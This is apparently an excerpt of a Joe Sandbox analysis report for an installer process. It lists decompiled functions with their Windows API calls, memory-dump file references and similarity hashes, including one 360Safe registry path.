                                                                                                                                                                      • Opcode ID: b2333b92fc10a895a60bffcd7bccc525501b802b9512316f1f78370eaf0c15b3
                                                                                                                                                                      • Instruction ID: 2b5fbd7560d947b750985db32371b8f7c794d3e65bd5a4c0a4c5a5d15e2612d8
                                                                                                                                                                      • Opcode Fuzzy Hash: b2333b92fc10a895a60bffcd7bccc525501b802b9512316f1f78370eaf0c15b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 63116D70D00618EADF15EB99C8919EDFBBAFF65300F50800AF559A7161DB305A49DF21
                                                                                                                                                                      Function 5F501F45 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F4FE53F: __EH_prolog3_catch.LIBCMT ref: 5F4FE546
                                                                                                                                                                        • Part of subcall function 5F4FE53F: __CxxThrowException@8.LIBCMT ref: 5F4FE56A
                                                                                                                                                                        • Part of subcall function 5F4FE53F: CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 5F4FE5F1
                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE600
                                                                                                                                                                        • Part of subcall function 5F4FE53F: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 5F4FE628
                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE632
                                                                                                                                                                        • Part of subcall function 5F4FE53F: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 5F4FE64B
                                                                                                                                                                        • Part of subcall function 5F4FE53F: GetLastError.KERNEL32 ref: 5F4FE658
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501F6F
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501F74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CountCreateTickTimerWaitable$Exception@8H_prolog3_catchMutexThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1909352761-0
                                                                                                                                                                      • Opcode ID: 2f9db7669bd8666994471a73379a19551d5a5d1915a144f99c9e79b42e16a0f1
                                                                                                                                                                      • Instruction ID: d984efa06ca613b212418b547e4f2fe191ab8601e8d2633d6871a9d01f224ce6
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f9db7669bd8666994471a73379a19551d5a5d1915a144f99c9e79b42e16a0f1
                                                                                                                                                                      • Instruction Fuzzy Hash: 2511D3B0801B809EC370DF6B9984D97FBF8FBD5B14750492EE58AC2A10E771A044CBA1
                                                                                                                                                                      Function 001B56BD Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 001B56D5
                                                                                                                                                                      • CreateWindowExW.USER32(?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 001B5746
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3732789607-0
                                                                                                                                                                      • Opcode ID: 4e4ee0be4c3bc8df7a4c9408a6960cf8ae53b22de975e4295df4d21297c4cc5a
                                                                                                                                                                      • Instruction ID: 62b35401c2fa450707df5827c97cb04cacf242e308f33db3c9f98ed9c247a714
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e4ee0be4c3bc8df7a4c9408a6960cf8ae53b22de975e4295df4d21297c4cc5a
                                                                                                                                                                      • Instruction Fuzzy Hash: 48114835210209EFDB148F54DD09FEA3BAAEF18300F058129FD05961A0EBB0ED60CFA0
                                                                                                                                                                      Function 0017DB68 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0017DBA8
                                                                                                                                                                        • Part of subcall function 001E4656: RaiseException.KERNEL32(?,?,?,001680B1,?,?,?,?,?,001680B1,0023F5B8,0023F5B8), ref: 001E4698
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 0017DBBE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow_wcsncpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3304455579-0
                                                                                                                                                                      • Opcode ID: b39b97bfc573b0d62510ffd80b7230dec1037ab724aae6404b2a9b4bcc82ff35
                                                                                                                                                                      • Instruction ID: be42a397d46851788087f23b5533404f13e12c81be7861cb9eb6c1905cddc868
                                                                                                                                                                      • Opcode Fuzzy Hash: b39b97bfc573b0d62510ffd80b7230dec1037ab724aae6404b2a9b4bcc82ff35
                                                                                                                                                                      • Instruction Fuzzy Hash: 1701DBB12006046ED724AF69DC42D69B7FCEF5A300B11882EF549C7191D77098408751
                                                                                                                                                                      Function 001B2F2F Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 001B2F39
                                                                                                                                                                        • Part of subcall function 00197451: BeginPaint.USER32(?,?), ref: 0019746E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001B2F66
                                                                                                                                                                        • Part of subcall function 00197323: CreateCompatibleDC.GDI32(?), ref: 00197347
                                                                                                                                                                        • Part of subcall function 00197323: SelectObject.GDI32(?,?), ref: 0019736E
                                                                                                                                                                        • Part of subcall function 00197323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00197387
                                                                                                                                                                        • Part of subcall function 001A6537: GetWindowRect.USER32(?,00000000), ref: 001A6554
                                                                                                                                                                        • Part of subcall function 00197395: BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 001973B8
                                                                                                                                                                        • Part of subcall function 00197395: SelectObject.GDI32(00000000,?), ref: 001973C3
                                                                                                                                                                        • Part of subcall function 00197395: DeleteDC.GDI32(00000000), ref: 001973E0
                                                                                                                                                                        • Part of subcall function 0019747C: EndPaint.USER32(?,?), ref: 0019748C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectPaintRectSelect$BeginClientCompatibleCreateDeleteH_prolog3_ViewportWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2413813215-0
                                                                                                                                                                      • Opcode ID: aee965ca4f81e61f7eb4f03e33dce47ee1ba30dbc870deb71eddb60b1ed6e4ee
                                                                                                                                                                      • Instruction ID: 1de3cc2252f4f7ced6d9cbcfeba0d6101b6ed0d8aad0484772d603b8c52e1439
                                                                                                                                                                      • Opcode Fuzzy Hash: aee965ca4f81e61f7eb4f03e33dce47ee1ba30dbc870deb71eddb60b1ed6e4ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C112971800A19EFDF219B91CC41DAEFBBAFF28304F008459E58966561DB726A15DB20
                                                                                                                                                                      Function 5F527D19 Relevance: 3.0, APIs: 2, Instructions: 49networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 533350023-0
                                                                                                                                                                      • Opcode ID: 1fe01c4ea417c8e8152979469d0050761c2e487089b13de27105fda0f6a4074d
                                                                                                                                                                      • Instruction ID: 4b989f3559251fe48ed3c757bab8ffe67f87bed32bee7bc8e281b9dc62c26943
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fe01c4ea417c8e8152979469d0050761c2e487089b13de27105fda0f6a4074d
                                                                                                                                                                      • Instruction Fuzzy Hash: 350156B19012099BEB30DAE4DC80BFE73ECAF59315F50063AA519D71C1EBB061089651
                                                                                                                                                                      Function 001D2080 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0017898E: RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 001789A8
                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,001CEAA4,?,0017BD49,00100000,00000000,0000008C), ref: 001D20EE
                                                                                                                                                                        • Part of subcall function 00178940: RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00178967
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalInitializeOpenSection
                                                                                                                                                                      • String ID: SOFTWARE\360Safe\softmgr\dio
                                                                                                                                                                      • API String ID: 2223640745-1814773269
                                                                                                                                                                      • Opcode ID: aeebd733bbdb3404232ab30c64fd65958f01a1ffb5e329cf843cd69c98f7e02e
                                                                                                                                                                      • Instruction ID: d8716e6d818938341ef13403452709554c0c0cd54b88600951b7e26e4e3d5424
                                                                                                                                                                      • Opcode Fuzzy Hash: aeebd733bbdb3404232ab30c64fd65958f01a1ffb5e329cf843cd69c98f7e02e
                                                                                                                                                                      • Instruction Fuzzy Hash: 44017CB1680719AAD3349F599CC5867F7ECFF59754390492EA19AC3A41DB70A9048710
                                                                                                                                                                      Function 0017ADC4 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0017ADE3
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000004), ref: 0017ADF3
                                                                                                                                                                        • Part of subcall function 0017995E: __EH_prolog3_catch.LIBCMT ref: 00179965
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileH_prolog3H_prolog3_catchModuleName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 749528002-0
                                                                                                                                                                      • Opcode ID: 66e389f9edbcb0b6856087f2e9e7328d6b748f092291cd22d773b5e18c73123a
                                                                                                                                                                      • Instruction ID: 4f2d9b3a3131ed117f0d33361ddd57368481047bb4b4b7455362c6909316dcf1
                                                                                                                                                                      • Opcode Fuzzy Hash: 66e389f9edbcb0b6856087f2e9e7328d6b748f092291cd22d773b5e18c73123a
                                                                                                                                                                      • Instruction Fuzzy Hash: A3018475A042489BDB14EFA4EC4ABFEB3A4FF14321F50482AE5259B1C1EF716608CB40
                                                                                                                                                                      Function 001EAC1C Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      • __lock_file.LIBCMT ref: 001EAC6C
                                                                                                                                                                        • Part of subcall function 001FD28B: __lock.LIBCMT ref: 001FD2B0
                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 001EAC76
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 717694121-0
                                                                                                                                                                      • Opcode ID: ff379ba5e303ff882faffae254b4d8aeb68678dd6e7fa1d40900cba413a0812e
                                                                                                                                                                      • Instruction ID: b1ac550a37a5e8eae5b6b5b7538a9dfec6d5fbff9d4c6e9a460f32fe6dc0a294
                                                                                                                                                                      • Opcode Fuzzy Hash: ff379ba5e303ff882faffae254b4d8aeb68678dd6e7fa1d40900cba413a0812e
                                                                                                                                                                      • Instruction Fuzzy Hash: CBF0F670C00E849BC721FB6B8802A5E7AA06F92730FB58745F079971D1C73866025B46
                                                                                                                                                                      Function 001965CA Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001965F1
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001965FD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$ClientInvalidate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 645284650-0
                                                                                                                                                                      • Opcode ID: f7c7f65a7043fa76ab08651f992ecff05a38df8c72d7ab4e916926278357585b
                                                                                                                                                                      • Instruction ID: ee1584baa596cdbe4443019bba63c58f451a06a12b6f414c10a1e859f0e80328
                                                                                                                                                                      • Opcode Fuzzy Hash: f7c7f65a7043fa76ab08651f992ecff05a38df8c72d7ab4e916926278357585b
                                                                                                                                                                      • Instruction Fuzzy Hash: 77F08731800644EBCB21DF4ADC489AFFFFAFFE5700B50892EE556A2120D770A940CB60
                                                                                                                                                                      Function 00183C23 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00183C2A
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000004,0018565F,?,?,?,?,0022D4D1,00000000), ref: 00183C51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeH_prolog3Library
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1631603194-0
                                                                                                                                                                      • Opcode ID: 7487c1307ea3c7e9e534b3ef2d25440b9af4e60bc61d8b3aae01f876f5902df8
                                                                                                                                                                      • Instruction ID: 5dc4f9e5d6fc30bd23fcef81221fb862f86033f4b619e1e9b3a997eb4441e9da
                                                                                                                                                                      • Opcode Fuzzy Hash: 7487c1307ea3c7e9e534b3ef2d25440b9af4e60bc61d8b3aae01f876f5902df8
                                                                                                                                                                      • Instruction Fuzzy Hash: E7F08131100B909BDB24BB76ED4699E77E5BF20704B00482DF1A657191DF70AA81CF10
                                                                                                                                                                      Function 001774B2 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 001774D1
                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,0021E8A0), ref: 001774E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                      • Opcode ID: 12d7802eff7f1faf0275ca461cb4ccea07b19ba3c29dd7be42bf1ef414a15b01
                                                                                                                                                                      • Instruction ID: 45b3e67f27afffbfed4e1e23e8261ae53f354c621c472845089513e17320826c
                                                                                                                                                                      • Opcode Fuzzy Hash: 12d7802eff7f1faf0275ca461cb4ccea07b19ba3c29dd7be42bf1ef414a15b01
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF01275600249AB8F04DFA9DD49CDFB7BCEF59710B41441AB906E3150DA70EA05C761
                                                                                                                                                                      Function 001775A2 Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.COMBASE(?,?), ref: 001775C1
                                                                                                                                                                      • CoCreateInstance.OLE32(?,?,?,0021E8B0), ref: 001775D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromInstanceProg
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2151042543-0
                                                                                                                                                                      • Opcode ID: 647dd434d0ec415e49b979baed3e3170887d498c59e1f355e66859c73c5fbc2b
                                                                                                                                                                      • Instruction ID: 75baa69018ea770a2d9203eda613aa216314f7204dc7004998f52385b6e2712d
                                                                                                                                                                      • Opcode Fuzzy Hash: 647dd434d0ec415e49b979baed3e3170887d498c59e1f355e66859c73c5fbc2b
                                                                                                                                                                      • Instruction Fuzzy Hash: 73F01C76A00249EB8F04DFA9ED49CDFB7BCEF59710B01402AB806E3190DA70EA05CB61
                                                                                                                                                                      Function 5F4D7D28 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 5F4D7D5A
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4D7D6F
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
